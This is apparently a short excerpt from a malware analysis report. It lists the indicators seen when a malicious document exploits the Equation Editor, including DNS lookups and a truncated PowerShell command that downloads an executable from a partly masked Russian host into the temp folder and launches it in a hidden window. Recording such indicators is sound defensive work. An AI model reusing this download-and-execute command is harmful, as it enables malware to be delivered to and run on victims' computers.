Technical information
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$aMJao=$env:temp+'\vos.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://s2####4.smrtp.ru/a/mi.exe' -Destination $aMJao;(New-Object -com Shell.Application).S...
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- DNS ASK s2####4.smrtp.ru
- DNS ASK oc##.#tartssl.com
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$aMJao=$env:temp+'\vos.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://s2####4.smrtp.ru/a/mi.exe' -Destination $aMJao;(New-Object -com Shell.Application).S...' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding